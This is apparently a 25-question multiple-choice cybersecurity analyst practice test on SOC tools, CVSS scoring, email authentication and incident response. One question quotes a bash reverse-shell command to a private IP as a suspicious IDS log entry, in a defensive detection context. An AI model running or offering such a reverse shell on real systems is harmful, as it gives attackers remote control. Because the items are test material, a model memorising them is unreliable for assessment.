Title of test:
PT003-06

Description:
Cybersecurity Practice Test

Author:
CrapTía

Creation Date:
07/01/2024

Category:
Computers

Number of questions: 25
Content:
An analyst examines events in multiple systems but has difficulty correlating data points. Which of the following is most likely the issue with the system?
- Access rights
- Network segmentation
- Time synchronization
- Invalid playbook

An analyst recommends that an EDR agent collect the source IP address, connect to the firewall, and create a policy to block the malicious source IP address across the entire network automatically. Which of the following is best to help the analyst implement this recommendation?
- SOAR
- SIEM
- SLA
- IoC

An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery controlled by a PC, which is utilizing the OS approaching the end-of-life date. Which of the following best describes a security analyst's concern?
- Any discovered vulnerabilities will not be remediated.
- An outage of machinery would cost the organization money.
- Support will not be available for the critical machinery.
- There are no compensating controls in place for the OS.

Which of the following describes the best reason for conducting a root cause analysis?
- The root cause analysis ensures that proper timelines are documented.
- The root cause analysis allows the incident to be properly documented for reporting.
- The root cause analysis develops recommendations to improve the process.
- The root cause analysis identifies the contributing items that facilitated the event.

Using an API to insert bulk access requests from a file into an identity management system is an example of which of the following concepts?
- Command and Control
- Data Enrichment
- Automation
- Single Sign-On

A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device's operating system. Which of the following best meets this requirement?
- SIEM
- CASB
- SOAR
- EDR

A security analyst identified the following suspicious entry in the host-based IDS logs:
bash -i >& /dev/tcp/10.1.2.3/8080 0>&1
Which of the following shell scripts should the analyst use to most accurately confirm whether the activity is ongoing?
- #!/bin/bash
  nc 10.1.2.3 8080 -vv >/dev/null && echo "Malicious activity" || echo "OK"
- #!/bin/bash
  ps -fea | grep 8080 >/dev/null && echo "Malicious activity" || echo "OK"
- #!/bin/bash
  ls /opt/tcp/10.1.2.3/8080 >/dev/null && echo "Malicious activity" || echo "OK"
- #!/bin/bash
  netstat -antp | grep 8080 >/dev/null && echo "Malicious activity" || echo "OK"

A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the following is the best solution to secure the network?
- Implement segmentation with ACLs.
- Configure logging and monitoring to the SIEM.
- Deploy MFA to cloud storage locations.
- Roll out an IDS.

A security analyst is reviewing the findings of the latest vulnerability report for a company's web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure?
- Deploy a WAF in front of the application.
- Replace the current MD5 with SHA-256.
- Deploy an antivirus application on the hosting system.
- Replace the MD5 with digital signatures.

A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that embeds software through the USB interface. Which of the following should the analyst do first?
- Conduct security awareness training on the risks of using unknown and unencrypted USBs.
- Write a removable media policy that explains that USBs cannot be connected to a company asset.
- Check configurations to determine whether USB ports are enabled on company assets.
- Review logs to see whether this exploitable vulnerability has already impacted the company.

A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to prove whether this server was experiencing this behavior?
- Nmap
- TCPDump
- SIEM
- EDR

A security analyst is validating a particular finding reported in a web application vulnerability scan to ensure it is not a false positive. The security analyst uses the snippet below (Picture). Which of the following vulnerability types is the security analyst validating?
- Directory Traversal
- XSS
- XXE
- SSRF

Which of the following is the most important factor to ensure accurate incident response reporting?
- A well-defined timeline of the events.
- A guideline for regulatory reporting.
- Logs from the impacted system.
- A well-developed executive summary.

A security analyst is trying to detect connections to a suspicious IP address by collecting the packet captures from the gateway. Which of the following commands should the security analyst consider running?
- grep [IP address] packets.pcap
- cat packets.pcap | grep [IP address]
- tcpdump -n -r packets.pcap host [IP address]
- strings packets.pcap | grep [IP address]

A security analyst reviews the latest vulnerability scans and observes there are vulnerabilities with similar CVSSv3 scores but different base score metrics. Which of the following attack vectors should the analyst remediate first?
- CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

A security analyst must review a suspicious email to determine its legitimacy. Which of the following should be performed? (Choose two.)
- Evaluate scoring fields, such as Spam Confidence Level and Bulk Complaint Level.
- Review the headers from the forwarded email.
- Examine the recipient address field.
- Review the Content-Type header.
- Evaluate the HELO or EHLO string of the connecting email server.
- Examine the SPF, DKIM, and DMARC fields from the original email.

A vulnerability analyst receives a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constraints of the current sprint, only three can be remediated. Which of the following represents the least impactful risk, given the CVSS3.1 base scores?
- AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L - Base Score 6.0
- AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:L - Base Score 7.2
- AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H - Base Score 6.4
- AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L - Base Score 6.5

A recent vulnerability scan resulted in an abnormally large number of critical and high findings that require patching. The SLA requires that the findings be remediated within a specific amount of time. Which of the following is the best approach to ensure all vulnerabilities are patched in accordance with the SLA?
- Integrate an IT service delivery ticketing system to track remediation and closure.
- Create a compensating control item until the system can be fully patched.
- Accept the risk and decommission current assets as end-of-life.
- Request an exception and manually patch each system.

Which of the following would help an analyst quickly determine whether the IP address in a SIEM alert is a known malicious IP address?
- Join an information-sharing and analysis center specific to the company's industry.
- Upload threat intelligence to the IPS in STIX/TAXII format.
- Add data enrichment for IPs in the ingestion pipeline.
- Review threat feeds after viewing the SIEM alert.

An organization was compromised, and the usernames and passwords of all employees were leaked online. Which of the following best describes the remediation that could reduce the impact of this situation?
- Multifactor Authentication
- Password Changes
- System Hardening
- Password Encryption

A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective?
- Deploy agents on all systems to perform the scans.
- Deploy a central scanner and perform non-credentialed scans.
- Deploy a cloud-based scanner and perform a network scan.
- Deploy a scanner sensor on every segment and perform credentialed scans.

An organization's email account was compromised by a bad actor. Given the following information (Picture): Which of the following is the length of time the team took to detect the threat?
- 15 Minutes
- 20 Minutes
- 45 Minutes
- 2 Hours

A security administrator needs to import PII data records from the production environment to the test environment for testing purposes. Which of the following would best protect data confidentiality?
- Data Masking
- Hashing
- Watermarking
- Encoding

The email system administrator for an organization configured DKIM signing for all emails legitimately sent by the organization. Which of the following would most likely indicate an email is malicious if the company's domain name is used as both the sender and the recipient?
- The message fails a DMARC check.
- The sending IP address is the hosting provider.
- The signature does not meet corporate standards.
- The sender and reply address are different.

During an incident involving phishing, a security analyst needs to find the source of the malicious email. Which of the following techniques would provide the analyst with this information?
- Header Analysis
- Packet Capture
- SSL Inspection
- Reverse Engineering